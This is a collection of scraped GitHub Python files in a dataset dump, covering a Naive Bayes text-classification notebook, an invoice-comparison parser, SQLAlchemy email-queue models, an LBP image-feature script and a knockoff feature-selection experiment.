stopwords\n\n# In[31]:\n\n\nprint('-'*175+'Naive Bayes with stop words removal'+'-'*175)\n\n\n# In[32]:\n\n\n# defining stopwords remover function\ndef remove_stopwords(text):\n text = text.lower()\n ls = [word for word in text.split() if word not in stop_words]\n return ' '.join(ls)\n\n\n# In[33]:\n\n\n# making copy of dataframe and applying lemmatizing to each text documents\nX_train_stop = X_train.copy()\nX_val_stop = X_val.copy()\nX_train_stop['text'] = X_train_stop['text'].apply(remove_stopwords)\nX_val_stop['text'] = X_val_stop['text'].apply(remove_stopwords)\n\n\n# In[34]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_stop['text'])\nX_val_bow = bow.transform(X_val_stop['text'])\n\n\n# In[35]:\n\n\nnb_clf_5 = MultinomialNB(alpha=2.0)\nnb_clf_5.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_5.predict(X_val_bow)\n\n\n# In[36]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n\n\n\n# # Experiment 6: Advanced Text Cleaning\n\n# In[37]:\n\n\nprint('-'*175+'Naive Bayes with advanced text cleaning'+'-'*175)\n\n\n# In[38]:\n\n\n# making copy of dataframe and applying lemmatizing to each text documents\nX_train_clean = X_train.copy()\nX_val_clean = X_val.copy()\nX_train_clean['text'] = X_train_clean['text'].apply(advanced_data_cleaning)\nX_val_clean['text'] = X_val_clean['text'].apply(advanced_data_cleaning)\n\n\n# In[39]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_clean['text'])\nX_val_bow = bow.transform(X_val_clean['text'])\n\n\n# In[40]:\n\n\nnb_clf_6 = MultinomialNB(alpha=2.0)\nnb_clf_6.fit(X_train_bow, y_train['target'].values)\ny_val_pred = nb_clf_6.predict(X_val_bow)\n\n\n# In[41]:\n\n\n# Printing the results\nprint('Accuracy score: ', accuracy_score(y_val['target'].values, y_val_pred))\nprint('Confusion Matrix: ')\nprint(confusion_matrix(y_val['target'].values, y_val_pred))\nprint('Classification Report: ')\nprint(classification_report(y_val['target'].values, y_val_pred))\n\n\n# In[ ]:\n\n\n# save the model to disk\nfilename = 'models/naive_bayes+BOW.sav'\njoblib.dump(nb_clf_6, filename)\n\n\n# # Finalizing model for Kaggle 
Submission\n\n# In[42]:\n\n\nprint(\"Naive Bayes experiments completed, starting retraining on full training data with best model for kaggle submission..\")\n\n\n# In[43]:\n\n\nX_train_final = train_data.copy()\nX_test_final = test_data.copy()\nX_train_final['text'] = X_train_final['text'].apply(advanced_data_cleaning)\nX_test_final['text'] = X_test_final['text'].apply(advanced_data_cleaning)\n\n\n# In[44]:\n\n\nbow = CountVectorizer()\nX_train_bow = bow.fit_transform(X_train_final['text'])\nX_test_bow = bow.transform(X_test_final['text'])\n\n\n# In[45]:\n\n\nnb_clf_6 = MultinomialNB(alpha=3.0)\nnb_clf_6.fit(X_train_bow, train_labels['target'].values)\ny_test_pred = nb_clf_6.predict(X_test_bow)\n\n\n# In[46]:\n\n\nprepare_kaggle_submission(y_test_pred, 'final-naive-bayes-advance-clean-bow-hp.csv')\n\n\n# In[47]:\n\n\n\nX_train_bow = X_train_bow.astype('float32')\nX_val_bow = X_val_bow.astype('float32')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kevalpipalia/Text-Classification-Challenge","sub_path":"NaiveBayes+BOW.py","file_name":"NaiveBayes+BOW.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1075848428","text":"first_set = {int(el) for el in input().split()}\nsecond_set = {int(el) for el in input().split()}\n\nn = int(input())\n\nfor _ in range(n):\n data = input().split()\n command = \" \".join(data[0:2])\n numbers = [int(num) for num in data[2:]]\n\n if command == \"Add First\":\n first_set.update(numbers)\n\n elif command == \"Add Second\":\n second_set.update(numbers)\n\n elif command == \"Remove First\":\n for num in numbers:\n if num in first_set:\n first_set.remove(num)\n\n elif command == \"Remove Second\":\n for num in numbers:\n if num in second_set:\n second_set.remove(num)\n\n elif command == \"Check Subset\":\n if first_set.issubset(second_set) or second_set.issubset(first_set):\n print(\"True\")\n else:\n print(\"False\")\n\nfirst_set_sorted = [str(num) for num in sorted(first_set)]\nsecond_set_sorted = [str(num) for num in sorted(second_set)]\n\nprint(\", \".join(first_set_sorted))\nprint(\", \".join(second_set_sorted))","repo_name":"nmoskova/Python-advanced","sub_path":"01-Lists_as_stacks_and_queues/_numbers.py","file_name":"_numbers.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32923371752","text":"import os\nimport hashlib\n\nfrom bs4 import BeautifulSoup\n\nfrom src.model.taxinvoice import (\n TaxInvoice,\n InvoiceRow,\n ENCODING,\n OUTPUT_DIR_REFERRER,\n new_error,\n get_header_format,\n get_error_format,\n)\n\nfrom src import utils as u\nfrom src.utils import bcolors\n\nHEADER_REFERRER = [\"Commission Type\", \"Client\", \"Referrer Name\", \"Amount Paid\", \"GST Paid\", \"Total Amount Paid\"]\n\n\nclass ReferrerTaxInvoice(TaxInvoice):\n def __init__(self, directory, filename):\n TaxInvoice.__init__(self, directory, filename)\n self.filetext = self.get_file_text()\n self.pair = None\n self.datarows = {}\n self.datarows_count = {}\n self.summary_errors = []\n self.margin = 0\n self._key = self.__generate_key()\n self.parse()\n\n def get_file_text(self):\n file = open(self.full_path, \"r\")\n print(file)\n return file.read()\n\n # region Parsers\n def parse(self):\n soup = BeautifulSoup(self.filetext, \"html.parser\")\n\n self._from = self.parse_from(soup)\n self.from_abn = self.parse_from_abn(soup)\n self.to = self.parse_to(soup)\n 
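# the parse_* helpers below all re-split the first <p> text on ':' and assume a\n # fixed 'From ... ABN ... To ... ABN ...' layout; slices such as [:-4] just trim\n # the label of the field that follows.\n 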
self.to_abn = self.parse_to_abn(soup)\n self.bsb = self.parse_bsb(soup)\n self.account = self.parse_account(soup)\n self.final_total = self.parse_final_total(soup)\n self.parse_rows(soup)\n\n def parse_from(self, soup: BeautifulSoup):\n parts_info = self._get_parts_info(soup)\n _from = parts_info[1][:-4]\n _from = _from.strip()\n return _from\n\n def parse_from_abn(self, soup: BeautifulSoup):\n parts_info = self._get_parts_info(soup)\n abn = parts_info[2][:-3]\n abn = abn.strip()\n return abn\n\n def parse_to(self, soup: BeautifulSoup):\n parts_info = self._get_parts_info(soup)\n to = parts_info[3][:-4]\n to = to.strip()\n return to\n\n def parse_to_abn(self, soup: BeautifulSoup):\n parts_info = self._get_parts_info(soup)\n abn = parts_info[4][:-5]\n abn = abn.strip()\n return abn\n\n def parse_bsb(self, soup: BeautifulSoup):\n parts_account = self._get_parts_account(soup)\n bsb = parts_account[1].split(\" - \")[0].strip()\n return bsb\n\n def parse_account(self, soup: BeautifulSoup):\n parts_account = self._get_parts_account(soup)\n account = parts_account[2].split(\"/\")[0].strip()\n return account\n\n def parse_final_total(self, soup: BeautifulSoup):\n parts_account = self._get_parts_account(soup)\n final_total = \"$\" + parts_account[3].split(\"$\")[1].strip()\n return final_total\n\n def parse_rows(self, soup: BeautifulSoup):\n header = soup.find(\"tr\") # Find header\n header = header.extract() # Remove header\n header = header.find_all(\"th\")\n table_rows = soup.find_all(\"tr\")\n row_number = 0\n for tr in table_rows:\n row_number += 1\n tds = tr.find_all(\"td\")\n if len(header) == 6:\n row = ReferrerInvoiceRow(\n tds[0].text, tds[1].text, tds[2].text, tds[3].text, tds[4].text, tds[5].text, row_number\n )\n self.__add_datarow(row)\n else:\n row = ReferrerInvoiceRow(\n tds[0].text, tds[1].text, \"\", tds[2].text, tds[3].text, tds[4].text, row_number\n )\n self.__add_datarow(row)\n\n def _get_parts_info(self, soup: BeautifulSoup):\n body = soup.find(\"body\")\n extracted_info = body.find(\"p\").text\n info = \" \".join(extracted_info.split())\n parts_info = info.split(\":\")\n return parts_info\n\n def _get_parts_account(self, soup: BeautifulSoup):\n body = soup.find(\"body\")\n extracted_account = body.find(\"p\").find_next(\"p\").text\n account = \" \".join(extracted_account.split())\n parts_account = account.split(\":\")\n return parts_account\n\n # endregion\n\n def __generate_key(self):\n sha = hashlib.sha256()\n\n filename_parts = self.filename.split(\"_\")\n filename_parts = filename_parts[:-5] # Remove process ID and date stamp\n\n for index, part in enumerate(filename_parts):\n if part == \"Referrer\":\n del filename_parts[index - 1] # Remove year-month stamp\n\n filename_forkey = \"\".join(filename_parts)\n sha.update(filename_forkey.encode(ENCODING))\n return sha.hexdigest()\n\n def process_comparison(self, margin=0.000001):\n if self.pair is None:\n return None\n assert type(self.pair) == type(self), \"self.pair is not of the correct type\"\n self.margin = margin\n self.pair.margin = margin\n\n workbook = self.create_workbook(OUTPUT_DIR_REFERRER)\n fmt_table_header = get_header_format(workbook)\n fmt_error = get_error_format(workbook)\n\n worksheet = workbook.add_worksheet()\n row = 0\n col_a = 0\n col_b = 8\n\n format_ = fmt_error if not self.equal_from else None\n worksheet.write(row, col_a, \"From\")\n worksheet.write(row, col_a + 1, self._from, format_)\n row += 1\n format_ = fmt_error if not self.equal_from_abn else None\n worksheet.write(row, col_a, \"From 
ABN\")\n worksheet.write(row, col_a + 1, self.from_abn, format_)\n row += 1\n format_ = fmt_error if not self.equal_to else None\n worksheet.write(row, col_a, \"To\")\n worksheet.write(row, col_a + 1, self.to, format_)\n row += 1\n format_ = fmt_error if not self.equal_to_abn else None\n worksheet.write(row, col_a, \"To ABN\")\n worksheet.write(row, col_a + 1, self.to_abn, format_)\n row += 1\n format_ = fmt_error if not self.equal_bsb else None\n worksheet.write(row, col_a, \"BSB\")\n worksheet.write(row, col_a + 1, self.bsb, format_)\n row += 1\n format_ = fmt_error if not self.equal_account else None\n worksheet.write(row, col_a, \"Account\")\n worksheet.write(row, col_a + 1, self.account, format_)\n row += 1\n format_ = fmt_error if not self.equal_final_total else None\n worksheet.write(row, col_a, \"Total\")\n worksheet.write(row, col_a + 1, self.final_total, format_)\n\n if self.pair is not None:\n row = 0\n format_ = fmt_error if not self.pair.equal_from else None\n worksheet.write(row, col_b, \"From\")\n worksheet.write(row, col_b + 1, self.pair._from, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_from_abn else None\n worksheet.write(row, col_b, \"From ABN\")\n worksheet.write(row, col_b + 1, self.pair.from_abn, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_to else None\n worksheet.write(row, col_b, \"To\")\n worksheet.write(row, col_b + 1, self.pair.to, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_to_abn else None\n worksheet.write(row, col_b, \"To ABN\")\n worksheet.write(row, col_b + 1, self.pair.to_abn, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_bsb else None\n worksheet.write(row, col_b, \"BSB\")\n worksheet.write(row, col_b + 1, self.pair.bsb, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_account else None\n worksheet.write(row, col_b, \"Account\")\n worksheet.write(row, col_b + 1, self.pair.account, format_)\n row += 1\n format_ = fmt_error if not self.pair.equal_final_total else None\n worksheet.write(row, col_b, \"Total\")\n worksheet.write(row, col_b + 1, self.pair.final_total, format_)\n\n if not self.equal_from:\n self.summary_errors.append(\n new_error(\n self.filename, self.pair.filename, \"From does not match\", \"\", \"\", self._from, self.pair._from\n )\n )\n if not self.equal_from_abn:\n self.summary_errors.append(\n new_error(\n self.filename,\n self.pair.filename,\n \"From ABN does not match\",\n \"\",\n \"\",\n self.from_abn,\n self.pair.from_abn,\n )\n )\n if not self.equal_to:\n self.summary_errors.append(\n new_error(self.filename, self.pair.filename, \"To does not match\", \"\", \"\", self.to, self.pair.to)\n )\n if not self.equal_to_abn:\n self.summary_errors.append(\n new_error(\n self.filename,\n self.pair.filename,\n \"To ABN does not match\",\n \"\",\n \"\",\n self.to_abn,\n self.pair.to_abn,\n )\n )\n if not self.equal_bsb:\n self.summary_errors.append(\n new_error(self.filename, self.pair.filename, \"BSB does not match\", \"\", \"\", self.bsb, self.pair.bsb)\n )\n if not self.equal_account:\n self.summary_errors.append(\n new_error(\n self.filename,\n self.pair.filename,\n \"Account does not match\",\n \"\",\n \"\",\n self.account,\n self.pair.account,\n )\n )\n if not self.equal_final_total:\n self.summary_errors.append(\n new_error(\n self.filename,\n self.pair.filename,\n \"Total does not match\",\n \"\",\n \"\",\n self.final_total,\n self.pair.final_total,\n )\n )\n\n row += 2\n\n for index, item in enumerate(HEADER_REFERRER):\n worksheet.write(row, 
col_a + index, item, fmt_table_header)\n worksheet.write(row, col_b + index, item, fmt_table_header)\n row += 1\n\n keys_unmatched = set(self.pair.datarows.keys() - set(self.datarows.keys()))\n\n # Code below is just to find the errors and write them into the spreadsheets\n for key_full in self.datarows.keys():\n self_row = self.datarows[key_full]\n self_row.margin = margin\n\n pair_row = self.find_pair_row(self_row)\n self_row.pair = pair_row\n\n if pair_row is not None:\n # delete from pair list so it doesn't get matched again\n del self.pair.datarows[pair_row.key_full]\n # Remove the key from the keys_unmatched if it is there\n if pair_row.key_full in keys_unmatched:\n keys_unmatched.remove(pair_row.key_full)\n\n pair_row.margin = margin\n pair_row.pair = self_row\n self.summary_errors += ReferrerInvoiceRow.write_row(\n worksheet, self, pair_row, row, fmt_error, \"right\", write_errors=False\n )\n\n self.summary_errors += ReferrerInvoiceRow.write_row(worksheet, self, self_row, row, fmt_error)\n row += 1\n\n # Write unmatched records\n for key in keys_unmatched:\n self.summary_errors += ReferrerInvoiceRow.write_row(\n worksheet, self, self.pair.datarows[key], row, fmt_error, \"right\", write_errors=False\n )\n row += 1\n\n if len(self.summary_errors) > 0:\n workbook.close()\n else:\n del workbook\n return self.summary_errors\n\n def find_pair_row(self, row):\n # Match by full_key\n pair_row = self.pair.datarows.get(row.key_full, None)\n if pair_row is not None:\n return pair_row\n\n # We want to match by similarity before matching by the key\n # Match by similarity\n for _, item in self.pair.datarows.items():\n if row.equals(item):\n return item\n\n # Match by key\n for _, item in self.pair.datarows.items():\n if row.key == item.key:\n return item\n\n # Return None if nothing found\n return None\n\n def __add_datarow(self, row):\n if row.key_full in self.datarows.keys(): # If the row already exists\n self.datarows_count[row.key_full] += 1 # Increment row count for that key\n row.key_full = row._generate_key(self.datarows_count[row.key_full]) # Generate new key for the record\n self.datarows[row.key_full] = row # Add row to the list\n else:\n self.datarows_count[row.key_full] = 0 # Start counter\n self.datarows[row.key_full] = row # Add row to the list\n\n # region Properties\n @property\n def equal_from(self):\n if self.pair is None:\n return False\n return u.sanitize(self._from) == u.sanitize(self.pair._from)\n\n @property\n def equal_from_abn(self):\n if self.pair is None:\n return False\n return u.sanitize(self.from_abn) == u.sanitize(self.pair.from_abn)\n\n @property\n def equal_to(self):\n if self.pair is None:\n return False\n return u.sanitize(self.to) == u.sanitize(self.pair.to)\n\n @property\n def equal_to_abn(self):\n if self.pair is None:\n return False\n return u.sanitize(self.to_abn) == u.sanitize(self.pair.to_abn)\n\n @property\n def equal_bsb(self):\n if self.pair is None:\n return False\n return u.sanitize(self.bsb) == u.sanitize(self.pair.bsb)\n\n @property\n def equal_account(self):\n if self.pair is None:\n return False\n return u.sanitize(self.account) == u.sanitize(self.pair.account)\n\n @property\n def equal_final_total(self):\n if self.pair is None:\n return False\n return self.compare_numbers(self.final_total, self.pair.final_total, self.margin)\n\n # endregion\n\n\nclass ReferrerInvoiceRow(InvoiceRow):\n def __init__(self, commission_type, client, referrer, amount_paid, gst_paid, total, row_number):\n InvoiceRow.__init__(self)\n self._pair = None\n self._margin = 
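0\n\n # note: _generate_key hashes only the identity fields (commission type, client,\n # referrer), while __generate_key_full also hashes the amounts, so rows that\n # differ only in dollar values still get distinct full keys.\n self._margin = 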
0\n\n self.commission_type = commission_type\n self.client = client\n self.referrer = referrer\n self.amount_paid = amount_paid\n self.gst_paid = gst_paid\n self.total = total\n\n self.row_number = row_number\n\n self._key = self._generate_key()\n self._key_full = self.__generate_key_full()\n\n # region Properties\n @property\n def key(self):\n return self._key\n\n @key.setter\n def key(self, k):\n self._key = k\n\n @property\n def key_full(self):\n return self._key_full\n\n @key_full.setter\n def key_full(self, k):\n self._key_full = k\n\n @property\n def pair(self):\n return self._pair\n\n @pair.setter\n def pair(self, pair):\n self._pair = pair\n\n @property\n def margin(self):\n return self._margin\n\n @margin.setter\n def margin(self, margin):\n self._margin = margin\n\n @property\n def equal_commission_type(self):\n if self.pair is None:\n return False\n return u.sanitize(self.commission_type) == u.sanitize(self.pair.commission_type)\n\n @property\n def equal_client(self):\n if self.pair is None:\n return False\n return u.sanitize(self.client) == u.sanitize(self.pair.client)\n\n @property\n def equal_referrer(self):\n if self.pair is None:\n return False\n return u.sanitize(self.referrer) == u.sanitize(self.pair.referrer)\n\n @property\n def equal_amount_paid(self):\n if self.pair is None:\n return False\n return self.compare_numbers(self.amount_paid, self.pair.amount_paid, self.margin)\n\n @property\n def equal_gst_paid(self):\n if self.pair is None:\n return False\n return self.compare_numbers(self.gst_paid, self.pair.gst_paid, self.margin)\n\n @property\n def equal_total(self):\n if self.pair is None:\n return False\n return self.compare_numbers(self.total, self.pair.total, self.margin)\n\n # endregion Properties\n\n def _generate_key(self, salt=\"\"):\n sha = hashlib.sha256()\n sha.update(u.sanitize(self.commission_type).encode(ENCODING))\n sha.update(u.sanitize(self.client).encode(ENCODING))\n sha.update(u.sanitize(self.referrer).encode(ENCODING))\n sha.update(str(salt).encode(ENCODING))\n return sha.hexdigest()\n\n def __generate_key_full(self, salt=\"\"):\n sha = hashlib.sha256()\n sha.update(self.commission_type.encode(ENCODING))\n sha.update(self.client.encode(ENCODING))\n sha.update(self.referrer.encode(ENCODING))\n sha.update(self.amount_paid.encode(ENCODING))\n sha.update(self.gst_paid.encode(ENCODING))\n sha.update(self.total.encode(ENCODING))\n sha.update(str(salt).encode(ENCODING))\n return sha.hexdigest()\n\n def equals(self, obj):\n if type(obj) != ReferrerInvoiceRow:\n return False\n\n return (\n u.sanitize(self.commission_type) == u.sanitize(obj.commission_type)\n and u.sanitize(self.client) == u.sanitize(obj.client)\n and u.sanitize(self.referrer) == u.sanitize(obj.referrer)\n and self.compare_numbers(self.amount_paid, obj.amount_paid, self.margin)\n and self.compare_numbers(self.gst_paid, obj.gst_paid, self.margin)\n and self.compare_numbers(self.total, obj.total, self.margin)\n )\n\n @staticmethod\n def write_row(worksheet, invoice, element, row, fmt_error, side=\"left\", write_errors=True):\n col = 0\n if side == \"right\":\n col = 8\n\n worksheet.write(row, col, element.commission_type)\n worksheet.write(row, col + 1, element.client)\n worksheet.write(row, col + 2, element.referrer)\n\n format_ = fmt_error if not element.equal_amount_paid else None\n worksheet.write(row, col + 3, element.amount_paid, format_)\n\n format_ = fmt_error if not element.equal_gst_paid else None\n worksheet.write(row, col + 4, element.gst_paid, format_)\n\n format_ = fmt_error if not 
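element.equal_total else None\n # 'side' shifted this table's columns to col 8 above, so the two files render side by side.\n format_ = fmt_error if not 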
element.equal_total else None\n worksheet.write(row, col + 5, element.total, format_)\n\n errors = []\n line_a = element.row_number\n if element.pair is not None:\n line_b = element.pair.row_number\n if write_errors:\n if not element.equal_amount_paid:\n errors.append(\n new_error(\n invoice.filename,\n invoice.pair.filename,\n \"Amount Paid does not match\",\n line_a,\n line_b,\n element.amount_paid,\n element.pair.amount_paid,\n )\n )\n\n if not element.equal_gst_paid:\n errors.append(\n new_error(\n invoice.filename,\n invoice.pair.filename,\n \"GST Paid does not match\",\n line_a,\n line_b,\n element.gst_paid,\n element.pair.gst_paid,\n )\n )\n\n if not element.equal_total:\n errors.append(\n new_error(\n invoice.filename,\n invoice.pair.filename,\n \"Total does not match\",\n line_a,\n line_b,\n element.total,\n element.pair.total,\n )\n )\n\n else:\n if write_errors:\n errors.append(\n new_error(\n invoice.filename, invoice.pair.filename, \"No corresponding row in commission file\", line_a, \"\"\n )\n )\n else:\n errors.append(\n new_error(\n invoice.filename, invoice.pair.filename, \"No corresponding row in commission file\", \"\", line_a\n )\n )\n return errors\n\n\ndef read_files_referrer(dir_: str, files: list) -> dict:\n records = {}\n counter = 1\n errors = []\n for file in files:\n print(f\"Parsing {counter} of {len(files)} files from {bcolors.BLUE}{dir_}{bcolors.ENDC}\", end=\"\\r\")\n if os.path.isdir(dir_ + file):\n continue\n # try:\n ti = ReferrerTaxInvoice(dir_, file)\n records[ti.key] = ti\n # except IndexError:\n # # handle exception when there is a column missing or an issue with the file.\n # errors.append(new_error(f\"{dir_}/{file}\", \"\", \"ERROR PARSING FILE!!!\"))\n counter += 1\n print()\n return records, errors\n","repo_name":"qkhan/rcti_comparison","sub_path":"src/model/taxinvoice_referrer.py","file_name":"taxinvoice_referrer.py","file_ext":"py","file_size_in_byte":21544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7045243504","text":"from ...utils import get_graphql_content\n\nUSER_QUERY = \"\"\"\nquery CustomerDetails($id:ID!){\n user(id: $id) {\n id\n email\n isConfirmed\n isActive\n orders(first: 10){\n edges {\n node {\n id\n number\n paymentStatus\n created\n }\n }\n }\n }\n}\n\"\"\"\n\n\ndef get_user(\n staff_api_client,\n user_id,\n):\n variables = {\"id\": user_id}\n\n response = staff_api_client.post_graphql(\n USER_QUERY,\n variables,\n )\n content = get_graphql_content(response)\n\n data = content[\"data\"][\"user\"]\n\n return data\n","repo_name":"saleor/saleor","sub_path":"saleor/tests/e2e/users/utils/get_user.py","file_name":"get_user.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":19331,"dataset":"github-code","pt":"67"} +{"seq_id":"22255006459","text":"\n# coding: utf-8\n\n# In[43]:\n\n\nimport numpy as np\nfrom PIL import Image\nfrom scipy.misc import imread\nfrom skimage import transform,data\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport random\nimport cv2\n#设置k值和取样数\nk = 7\nTEST_RATE = 20\n#X_train = np.loadtxt(\"train_X.txt\")\n#已经处理好的特征矩阵\ncolors = np.loadtxt(\"colors.txt\")\nLBP_hist = np.loadtxt(\"LBP_hist.txt\")\n\ndef LBP(img):#LBP算法,提取图像纹理特征\n col, row = img.shape\n tempSave = []\n dataLBP = []\n for i in range(1,col-1):\n for j in range(1,row-1):\n if img[i][j] > img[i-1][j-1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i-1][j]:#\n tempSave.append(0)\n 
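# LBP sketch: each pixel is compared with its 8 neighbours in a fixed order; the\n # eight 0/1 flags are joined into a byte string, so e.g. '00000001' becomes\n # int('00000001', 2) == 1 further down.\n 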
else:\n tempSave.append(1)\n if img[i][j] > img[i-1][j+1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i][j+1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i+1][j+1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i+1][j]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i+1][j-1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i][j-1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n temp = [str(k) for k in tempSave]\n p = ''.join(temp)\n dataLBP.append(int(p,2))\n tempSave = []\n a = np.array([dataLBP])\n return a#a为一维行向量\n\n'''\n数据处理,利用LBP提取纹理特征后,做成训练矩阵\n\nfor i in range(1,201):\n s=\"%s%s%d%s%s\"%('train_data/','data (',i,')','.jpg')#原图片名为data (i).jpg\n im = Image.open(s)\n L = im.convert('L')#转化为灰度图\n s=\"%s%d%s\"%('train/',i,'.jpg')\n L.save(s)\nimg = imread('train/1.jpg')\ntrain_X = LBP(img)\nfor i in range(2,201):\n s=\"%s%d%s\"%('train/',i,'.jpg')\n img = imread(s)\n img = LBP(img)\n train_X = np.concatenate((train_X,img), axis = 0)#将每个图片的特征拼接起来,成为(200,22940)的矩阵\nnp.savetxt(\"train_X.txt\",train_X)\n \n '''\n\n'''\n加载训练好的LBP特征,将其作为LBP直方图\nx_train = np.loadtxt(\"train_X.txt\")\nX_train = np.ones([200,256])\nX = []\nprint(x_train.shape)\nfor i in range(200):\n for j in range(256):\n for x in map(lambda x:(j<=x and x 1:\n raise app.UsageError('Too many command-line arguments.')\n\n tf.compat.v1.enable_v2_behavior()\n run_experiment()\n\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"i-m-sankha16/federated","sub_path":"tensorflow_federated/python/research/baselines/stackoverflow/run_centralized.py","file_name":"run_centralized.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"14165022591","text":"from sqlalchemy import Column, String, BigInteger, ForeignKey, Text, Integer, Index, DateTime\nfrom sqlalchemy.dialects.mysql import MEDIUMBLOB, MEDIUMTEXT\n\nfrom .base import BasicMixin, BaseObject\n\n\nclass ExternalEmail(BaseObject, BasicMixin):\n address = Column(String(128), unique=True)\n active_confirm = Column(DateTime)\n user_id = Column(BigInteger, ForeignKey('users.id'))\n disabled = Column(Integer)\n\n\nclass InternalEmail(BaseObject, BasicMixin):\n address = Column(String(128), unique=True)\n\n\nclass InternalEmailMap(BaseObject, BasicMixin):\n internal_email_id = Column(BigInteger, ForeignKey('internal_emails.id'))\n user_id = Column(BigInteger, ForeignKey('users.id'))\n group_id = Column(BigInteger, ForeignKey('groups.id'))\n\n\nclass Message(BaseObject, BasicMixin):\n internal_email_id = Column(BigInteger, ForeignKey('internal_emails.id'))\n message_to = Column(String(128))\n message_from = Column(String(128))\n message_text = Column(Text)\n message_dump = Column(MEDIUMTEXT)\n reply_address = Column(String(128), unique=True)\n\n\nclass MessageQueueStatus:\n STATUS_UNPROCESSED = 0\n STATUS_ERROR = 1\n STATUS_SENT = 2\n STATUS_DELIVERED = 3\n STATUS_BOUNCE_TEMP = 4\n STATUS_BOUNCE_PERM = 5\n\n\nclass MessagePriority:\n PRIORITY_HIGH = 0\n PRIORITY_PLUS = 25\n PRIORITY_NORMAL = 50\n PRIORITY_MINUS = 75\n PRIORITY_LOW = 100\n\n PRIORITY_ON_DEMAND = PRIORITY_HIGH\n PRIORITY_DEFAULT = PRIORITY_NORMAL\n\n PRIORITY_PRE_MAILING_LIST = PRIORITY_NORMAL + 5\n PRIORITY_MAILING_LIST = PRIORITY_NORMAL + 10\n PRIORITY_POST_MAILING_LIST = PRIORITY_NORMAL + 15\n\n\nclass MessageQueue(BaseObject, BasicMixin, MessageQueueStatus, MessagePriority):\n 
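# mixes in the STATUS_* lifecycle and PRIORITY_* ordering constants above; a\n # worker could e.g. filter on status == MessageQueue.STATUS_UNPROCESSED and sort\n # with order_by(*MessageQueue.default_sort_column()) (sketch, assuming a normal\n # SQLAlchemy session).\n 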
content_type = Column(Text)\n message_dump = Column(MEDIUMBLOB)\n status = Column(Integer, nullable=False, default=0)\n error_text = Column(Text)\n priority = Column(Integer, nullable=False, default=0)\n user_id = Column(BigInteger)\n from_message_id = Column(BigInteger, ForeignKey('messages.id'))\n mailgun_message_id = Column(String(256))\n\n __table_args__ = (\n Index('idx_status', 'status'),\n Index('idx_mailgun_message_id', 'mailgun_message_id'),\n )\n\n @classmethod\n def default_sort_column(cls):\n return cls.priority, cls.user_id, cls.from_message_id, cls.status\n","repo_name":"yu-ichiro/database","sub_path":"model/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30326746885","text":"from __future__ import print_function\n\nimport numpy as np \nfrom fs_fdr import knockoff_features_construction, barber_candes_selection, utils\n\n\nn, p, p1 = 1000, 50, 20\nrho = 0.\nmean = 0.\nsd = 1.\nerror_std = 1.\nx = mean + sd * np.random.normal(0., 1., size=(n, p))\ntrue_w = np.random.uniform(r[1], r[2], size=(p1, 1))\nnegate = np.random.binomial(n=1, p=.5, size=(p1, 1))\nnegate[np.where(negate==0.), :] = -1\ntrue_w = true_w * negate\ntrue_index = np.random.choice(np.arange(p), size = p1, replace=False)\ntrue_index = np.sort(true_index)\nxbeta = np.dot(x[:, true_index], true_w)\npr = 1/(1+np.exp(-xbeta))\nt = (pr > .5) + 0.\n\nq = .1\n\n\nmodelings = [\\\n{\"model\":\"logistic regression\", \"params\":\"plain regression coef\"},\\\n{\"model\":\"logistic regression\", \"params\":\"ridge coef\"},\\\n{\"model\":\"logistic regression\", \"params\":\"lasso coef\"},\\\n{\"model\":\"logistic regression\", \"params\":\"lasso learning rate\"},\\\n{\"model\":\"random forest\", \"params\":\"classification fi\"},\\\n{\"model\":\"tree\", \"params\":\"classification fi\"},\\\n{\"model\":\"gradient boosting\", \"params\":\"classification fi\"},\\\n{\"model\":\"svm\", \"params\":\"classification coef\"}\\\n]\n\nVI_stats = [\"Diff\"]\nselection_methods = [\"knockoff-MX\"]\noptimizations = [\"SDP\", \"samplecorr\"]\n\n \nfor selection_method in selection_methods:\n\tfor optimization in optimizations:\n\n\t\tmyknockoff = knockoff_features_construction.Knockoff(x, selection_method, optimization)\n\t\tknockoff_attrs = myknockoff.knockoff_features()\n\t\tx, x_tilda = knockoff_attrs.X, knockoff_attrs.X_tilde\n\t\tdata = [x, x_tilda, t] \n\n\t\tfor modeling in modelings:\n\t\t\tfor VI_stat in VI_stats:\n\n\t\t\t\tknockoff_selection = barber_candes_selection.BarberCandesSelection(data, modeling, selection_method,q=q, 